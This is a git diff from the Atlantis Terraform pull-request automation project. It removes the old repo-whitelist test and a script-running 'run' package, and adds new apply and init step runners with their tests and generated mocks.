+ false,
+ },
+ {
+ "* should match anything",
+ "*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com* should match anything github",
+ "github.com*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com* should not match gitlab",
+ "github.com*",
+ "owner/repo",
+ "gitlab.com",
+ false,
+ },
+ {
+ "github.com/o* should match",
+ "github.com/o*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/rep* should not match",
+ "github.com/owner/rep*",
+ "owner/re",
+ "github.com",
+ false,
+ },
+ {
+ "github.com/owner/rep* should match",
+ "github.com/owner/rep*",
+ "owner/rep",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/o* should not match",
+ "github.com/o*",
+ "somethingelse/repo",
+ "github.com",
+ false,
+ },
+ {
+ "github.com/owner/repo* should match exactly",
+ "github.com/owner/repo*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/* should match anything in org",
+ "github.com/owner/*",
+ "owner/repo",
+ "github.com",
+ true,
+ },
+ {
+ "github.com/owner/* should not match anything not in org",
+ "github.com/owner/*",
+ "otherorg/repo",
+ "github.com",
+ false,
+ },
+ {
+ "if there's any * it should match",
+ "github.com/owner/repo,*",
+ "otherorg/repo",
+ "github.com",
+ true,
+ },
+ {
+ "any exact match should match",
+ "github.com/owner/repo,github.com/otherorg/repo",
+ "otherorg/repo",
+ "github.com",
+ true,
+ },
+ {
+ "longer shouldn't match on exact",
+ "github.com/owner/repo",
+ "owner/repo-longer",
+ "github.com",
+ false,
+ },
+ {
+ "should be case insensitive",
+ "github.com/owner/repo",
+ "OwNeR/rEpO",
+ "github.com",
+ true,
+ },
+ {
+ "should be case insensitive for wildcards",
+ "github.com/owner/*",
+ "OwNeR/rEpO",
+ "github.com",
+ true,
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ w := events.RepoWhitelistChecker{Whitelist: c.Whitelist}
+ Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname))
+ })
+ }
+}
diff --git a/server/events/repo_whitelist_test.go b/server/events/repo_whitelist_test.go
deleted file mode 100644
index 21e3585725..0000000000
--- a/server/events/repo_whitelist_test.go
+++ /dev/null
@@ -1,158 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "testing"
-
- "github.com/runatlantis/atlantis/server/events"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-func TestIsWhitelisted(t *testing.T) {
- cases := []struct {
- Description string
- Whitelist string
- RepoFullName string
- Hostname string
- Exp bool
- }{
- {
- "exact match",
- "github.com/owner/repo",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "exact match shouldn't match anything else",
- "github.com/owner/repo",
- "owner/rep",
- "github.com",
- false,
- },
- {
- "* should match anything",
- "*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com* should match anything github",
- "github.com*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com* should not match gitlab",
- "github.com*",
- "owner/repo",
- "gitlab.com",
- false,
- },
- {
- "github.com/o* should match",
- "github.com/o*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/rep* should not match",
- "github.com/owner/rep*",
- "owner/re",
- "github.com",
- false,
- },
- {
- "github.com/owner/rep* should match",
- "github.com/owner/rep*",
- "owner/rep",
- "github.com",
- true,
- },
- {
- "github.com/o* should not match",
- "github.com/o*",
- "somethingelse/repo",
- "github.com",
- false,
- },
- {
- "github.com/owner/repo* should match exactly",
- "github.com/owner/repo*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/* should match anything in org",
- "github.com/owner/*",
- "owner/repo",
- "github.com",
- true,
- },
- {
- "github.com/owner/* should not match anything not in org",
- "github.com/owner/*",
- "otherorg/repo",
- "github.com",
- false,
- },
- {
- "if there's any * it should match",
- "github.com/owner/repo,*",
- "otherorg/repo",
- "github.com",
- true,
- },
- {
- "any exact match should match",
- "github.com/owner/repo,github.com/otherorg/repo",
- "otherorg/repo",
- "github.com",
- true,
- },
- {
- "longer shouldn't match on exact",
- "github.com/owner/repo",
- "owner/repo-longer",
- "github.com",
- false,
- },
- {
- "should be case insensitive",
- "github.com/owner/repo",
- "OwNeR/rEpO",
- "github.com",
- true,
- },
- {
- "should be case insensitive for wildcards",
- "github.com/owner/*",
- "OwNeR/rEpO",
- "github.com",
- true,
- },
- }
-
- for _, c := range cases {
- t.Run(c.Description, func(t *testing.T) {
- w := events.RepoWhitelist{Whitelist: c.Whitelist}
- Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname))
- })
- }
-}
diff --git a/server/events/run/mocks/matchers/ptr_to_go_version_version.go b/server/events/run/mocks/matchers/ptr_to_go_version_version.go
deleted file mode 100644
index 0242745f3e..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_go_version_version.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- go_version "github.com/hashicorp/go-version"
- "github.com/petergtz/pegomock"
-)
-
-func AnyPtrToGoVersionVersion() *go_version.Version {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*go_version.Version))(nil)).Elem()))
- var nullValue *go_version.Version
- return nullValue
-}
-
-func EqPtrToGoVersionVersion(value *go_version.Version) *go_version.Version {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *go_version.Version
- return nullValue
-}
diff --git a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go b/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
deleted file mode 100644
index 0889f65d58..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-func AnyPtrToLoggingSimpleLogger() *logging.SimpleLogger {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*logging.SimpleLogger))(nil)).Elem()))
- var nullValue *logging.SimpleLogger
- return nullValue
-}
-
-func EqPtrToLoggingSimpleLogger(value *logging.SimpleLogger) *logging.SimpleLogger {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue *logging.SimpleLogger
- return nullValue
-}
diff --git a/server/events/run/mocks/matchers/slice_of_string.go b/server/events/run/mocks/matchers/slice_of_string.go
deleted file mode 100644
index b82bbd1151..0000000000
--- a/server/events/run/mocks/matchers/slice_of_string.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package matchers
-
-import (
- "reflect"
-
- "github.com/petergtz/pegomock"
-)
-
-func AnySliceOfString() []string {
- pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]string))(nil)).Elem()))
- var nullValue []string
- return nullValue
-}
-
-func EqSliceOfString(value []string) []string {
- pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
- var nullValue []string
- return nullValue
-}
diff --git a/server/events/run/mocks/mock_runner.go b/server/events/run/mocks/mock_runner.go
deleted file mode 100644
index a48820b113..0000000000
--- a/server/events/run/mocks/mock_runner.go
+++ /dev/null
@@ -1,101 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events/run (interfaces: Runner)
-
-package mocks
-
-import (
- "reflect"
-
- go_version "github.com/hashicorp/go-version"
- pegomock "github.com/petergtz/pegomock"
- logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-type MockRunner struct {
- fail func(message string, callerSkip ...int)
-}
-
-func NewMockRunner() *MockRunner {
- return &MockRunner{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) (string, error) {
- params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
- result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
- var ret0 string
- var ret1 error
- if len(result) != 0 {
- if result[0] != nil {
- ret0 = result[0].(string)
- }
- if result[1] != nil {
- ret1 = result[1].(error)
- }
- }
- return ret0, ret1
-}
-
-func (mock *MockRunner) VerifyWasCalledOnce() *VerifierRunner {
- return &VerifierRunner{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierRunner {
- return &VerifierRunner{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierRunner {
- return &VerifierRunner{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierRunner struct {
- mock *MockRunner
- invocationCountMatcher pegomock.Matcher
- inOrderContext *pegomock.InOrderContext
-}
-
-func (verifier *VerifierRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) *Runner_Execute_OngoingVerification {
- params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
- methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
- return &Runner_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Runner_Execute_OngoingVerification struct {
- mock *MockRunner
- methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Runner_Execute_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, []string, string, string, *go_version.Version, string) {
- log, commands, path, workspace, terraformVersion, stage := c.GetAllCapturedArguments()
- return log[len(log)-1], commands[len(commands)-1], path[len(path)-1], workspace[len(workspace)-1], terraformVersion[len(terraformVersion)-1], stage[len(stage)-1]
-}
-
-func (c *Runner_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 [][]string, _param2 []string, _param3 []string, _param4 []*go_version.Version, _param5 []string) {
- params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
- if len(params) > 0 {
- _param0 = make([]*logging.SimpleLogger, len(params[0]))
- for u, param := range params[0] {
- _param0[u] = param.(*logging.SimpleLogger)
- }
- _param1 = make([][]string, len(params[1]))
- for u, param := range params[1] {
- _param1[u] = param.([]string)
- }
- _param2 = make([]string, len(params[2]))
- for u, param := range params[2] {
- _param2[u] = param.(string)
- }
- _param3 = make([]string, len(params[3]))
- for u, param := range params[3] {
- _param3[u] = param.(string)
- }
- _param4 = make([]*go_version.Version, len(params[4]))
- for u, param := range params[4] {
- _param4[u] = param.(*go_version.Version)
- }
- _param5 = make([]string, len(params[5]))
- for u, param := range params[5] {
- _param5[u] = param.(string)
- }
- }
- return
-}
diff --git a/server/events/run/run.go b/server/events/run/run.go
deleted file mode 100644
index 45d270e90f..0000000000
--- a/server/events/run/run.go
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-// Package run handles running commands prior and following the
-// regular Atlantis commands.
-package run
-
-import (
- "bufio"
- "fmt"
- "io/ioutil"
- "os"
- "os/exec"
- "strings"
-
- "github.com/hashicorp/go-version"
- "github.com/pkg/errors"
- "github.com/runatlantis/atlantis/server/logging"
-)
-
-const inlineShebang = "#!/bin/sh -e"
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_runner.go Runner
-
-type Runner interface {
- Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *version.Version, stage string) (string, error)
-}
-
-type Run struct{}
-
-// Execute runs the commands by writing them as a script to disk
-// and then executing the script.
-func (p *Run) Execute(
- log *logging.SimpleLogger,
- commands []string,
- path string,
- workspace string,
- terraformVersion *version.Version,
- stage string) (string, error) {
- // we create a script from the commands provided
- if len(commands) == 0 {
- return "", errors.Errorf("%s commands cannot be empty", stage)
- }
-
- s, err := createScript(commands, stage)
- if err != nil {
- return "", err
- }
- defer os.Remove(s) // nolint: errcheck
-
- log.Info("running %s commands: %v", stage, commands)
-
- // set environment variable for the run.
- // this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
- // and DIR variables in their scripts
- os.Setenv("WORKSPACE", workspace) // nolint: errcheck
- os.Setenv("ATLANTIS_TERRAFORM_VERSION", terraformVersion.String()) // nolint: errcheck
- os.Setenv("DIR", path) // nolint: errcheck
- return execute(s)
-}
-
-func createScript(cmds []string, stage string) (string, error) {
- tmp, err := ioutil.TempFile("/tmp", "atlantis-temp-script")
- if err != nil {
- return "", errors.Wrapf(err, "preparing %s shell script", stage)
- }
-
- scriptName := tmp.Name()
-
- // Write our contents to it
- writer := bufio.NewWriter(tmp)
- if _, err = writer.WriteString(fmt.Sprintf("%s\n", inlineShebang)); err != nil {
- return "", errors.Wrapf(err, "writing to %q", tmp.Name())
- }
- cmdsJoined := strings.Join(cmds, "\n")
- if _, err := writer.WriteString(cmdsJoined); err != nil {
- return "", errors.Wrapf(err, "preparing %s", stage)
- }
-
- if err := writer.Flush(); err != nil {
- return "", errors.Wrap(err, "flushing contents to file")
- }
- tmp.Close() // nolint: errcheck
-
- if err := os.Chmod(scriptName, 0700); err != nil { // nolint: gas
- return "", errors.Wrapf(err, "making %s script executable", stage)
- }
-
- return scriptName, nil
-}
-
-func execute(script string) (string, error) {
- localCmd := exec.Command("sh", "-c", script) // #nosec
- out, err := localCmd.CombinedOutput()
- output := string(out)
- if err != nil {
- return output, errors.Wrapf(err, "running script %s: %s", script, output)
- }
-
- return output, nil
-}
diff --git a/server/events/run/run_test.go b/server/events/run/run_test.go
deleted file mode 100644
index 2fac2af9a4..0000000000
--- a/server/events/run/run_test.go
+++ /dev/null
@@ -1,54 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package run
-
-import (
- "testing"
-
- "github.com/hashicorp/go-version"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var logger = logging.NewNoopLogger()
-var run = &Run{}
-
-func TestRunCreateScript_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- scriptName, err := createScript(cmds, "post_apply")
- Assert(t, scriptName != "", "there should be a script name")
- Assert(t, err == nil, "there should not be an error")
-}
-
-func TestRunExecuteScript_invalid(t *testing.T) {
- cmds := []string{"invalid", "command"}
- scriptName, _ := createScript(cmds, "post_apply")
- _, err := execute(scriptName)
- Assert(t, err != nil, "there should be an error")
-}
-
-func TestRunExecuteScript_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- scriptName, _ := createScript(cmds, "post_apply")
- output, err := execute(scriptName)
- Assert(t, err == nil, "there should not be an error")
- Assert(t, output != "", "there should be output")
-}
-
-func TestRun_valid(t *testing.T) {
- cmds := []string{"echo", "date"}
- v, _ := version.NewVersion("0.8.8")
- _, err := run.Execute(logger, cmds, "/tmp/atlantis", "staging", v, "post_apply")
- Ok(t, err)
-}
diff --git a/server/events/runtime/apply_step_runner.go b/server/events/runtime/apply_step_runner.go
new file mode 100644
index 0000000000..6746fae725
--- /dev/null
+++ b/server/events/runtime/apply_step_runner.go
@@ -0,0 +1,35 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// ApplyStepRunner runs `terraform apply`.
+type ApplyStepRunner struct {
+ TerraformExecutor TerraformExec
+}
+
+func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ // todo: move this to a common library
+ planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+ planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
+ }
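+	// e.g. workspace "default" with no project name yields "default.tfplan";
+	// a project named "projectname" in workspace "default" yields
+	// "projectname-default.tfplan".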
+ planFile := filepath.Join(path, planFileName)
+ stat, err := os.Stat(planFile)
+ if err != nil || stat.IsDir() {
+ return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelDir, ctx.Workspace)
+ }
+
+ tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile)
+ var tfVersion *version.Version
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+ return a.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, tfApplyCmd, tfVersion, ctx.Workspace)
+}
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
new file mode 100644
index 0000000000..0f3a7a9572
--- /dev/null
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -0,0 +1,125 @@
+package runtime_test
+
+import (
+ "io/ioutil"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoDir(t *testing.T) {
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: nil,
+ }
+ _, err := o.Run(models.ProjectCommandContext{
+ RepoRelDir: ".",
+ Workspace: "workspace",
+ }, nil, "/nonexistent/path")
+ ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_NoPlanFile(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: nil,
+ }
+ _, err := o.Run(models.ProjectCommandContext{
+ RepoRelDir: ".",
+ Workspace: "workspace",
+ }, nil, tmpDir)
+ ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_Success(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "workspace.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace")
+}
+
+func TestRun_AppliesCorrectProjectPlan(t *testing.T) {
+ // When running for a project, the planfile has a different name.
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "projectname-default.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ projectName := "projectname"
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "default",
+ RepoRelDir: ".",
+ ProjectConfig: &valid.Project{
+ Name: &projectName,
+ },
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "default")
+}
+
+func TestRun_UsesConfiguredTFVersion(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "workspace.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+ tfVersion, _ := version.NewVersion("0.11.0")
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ CommentArgs: []string{"comment", "args"},
+ ProjectConfig: &valid.Project{
+ TerraformVersion: tfVersion,
+ },
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
+}
diff --git a/server/events/runtime/init_step_runner.go b/server/events/runtime/init_step_runner.go
new file mode 100644
index 0000000000..da8ae585ff
--- /dev/null
+++ b/server/events/runtime/init_step_runner.go
@@ -0,0 +1,30 @@
+package runtime
+
+import (
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// InitStepRunner runs `terraform init`.
+type InitStepRunner struct {
+ TerraformExecutor TerraformExec
+ DefaultTFVersion *version.Version
+}
+
+// nolint: unparam
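+// Run runs `terraform init` (or `terraform get` for Terraform < 0.9). The
+// command's output is discarded since init output isn't posted back to the
+// pull request.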
+func (i *InitStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ tfVersion := i.DefaultTFVersion
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+ // If we're running < 0.9 we have to use `terraform get` instead of `init`.
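+	// MustConstraint is presumably a helper defined elsewhere in this package
+	// that parses the constraint string and panics on error; safe here since
+	// the string is a constant.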
+ if MustConstraint("< 0.9.0").Check(tfVersion) {
+ ctx.Log.Info("running terraform version %s so will use `get` instead of `init`", tfVersion)
+ terraformGetCmd := append([]string{"get", "-no-color"}, extraArgs...)
+ _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, terraformGetCmd, tfVersion, ctx.Workspace)
+ return "", err
+	}
+
+	_, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, append([]string{"init", "-no-color"}, extraArgs...), tfVersion, ctx.Workspace)
+	return "", err
+}
diff --git a/server/events/runtime/init_step_runner_test.go b/server/events/runtime/init_step_runner_test.go
new file mode 100644
index 0000000000..ff0ec9f084
--- /dev/null
+++ b/server/events/runtime/init_step_runner_test.go
@@ -0,0 +1,66 @@
+package runtime_test
+
+import (
+ "testing"
+
+ version "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
+ RegisterMockTestingT(t)
+ cases := []struct {
+ version string
+ expCmd string
+ }{
+ {
+ "0.8.9",
+ "get",
+ },
+ {
+ "0.9.0",
+ "init",
+ },
+ {
+ "0.9.1",
+ "init",
+ },
+ {
+ "0.10.0",
+ "init",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.version, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion(c.version)
+ logger := logging.NewNoopLogger()
+ iso := runtime.InitStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+
+ output, err := iso.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+ // Shouldn't return output since we don't print init output to PR.
+ Equals(t, "", output)
+
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expCmd, "-no-color", "extra", "args"}, tfVersion, "workspace")
+ })
+ }
+}
diff --git a/server/events/runtime/mocks/matchers/models_pullrequest.go b/server/events/runtime/mocks/matchers/models_pullrequest.go
new file mode 100644
index 0000000000..d8b146baa4
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_pullrequest.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsPullRequest() models.PullRequest {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.PullRequest))(nil)).Elem()))
+ var nullValue models.PullRequest
+ return nullValue
+}
+
+func EqModelsPullRequest(value models.PullRequest) models.PullRequest {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.PullRequest
+ return nullValue
+}
diff --git a/server/events/runtime/mocks/matchers/models_repo.go b/server/events/runtime/mocks/matchers/models_repo.go
new file mode 100644
index 0000000000..3f8e699ebe
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsRepo() models.Repo {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.Repo))(nil)).Elem()))
+ var nullValue models.Repo
+ return nullValue
+}
+
+func EqModelsRepo(value models.Repo) models.Repo {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.Repo
+ return nullValue
+}
diff --git a/server/events/runtime/mocks/mock_pull_approved_checker.go b/server/events/runtime/mocks/mock_pull_approved_checker.go
new file mode 100644
index 0000000000..69f1e4a502
--- /dev/null
+++ b/server/events/runtime/mocks/mock_pull_approved_checker.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/runtime (interfaces: PullApprovedChecker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockPullApprovedChecker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockPullApprovedChecker() *MockPullApprovedChecker {
+ return &MockPullApprovedChecker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
+ params := []pegomock.Param{baseRepo, pull}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("PullIsApproved", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 bool
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(bool)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledOnce() *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, pegomock.Times(1), nil}
+}
+
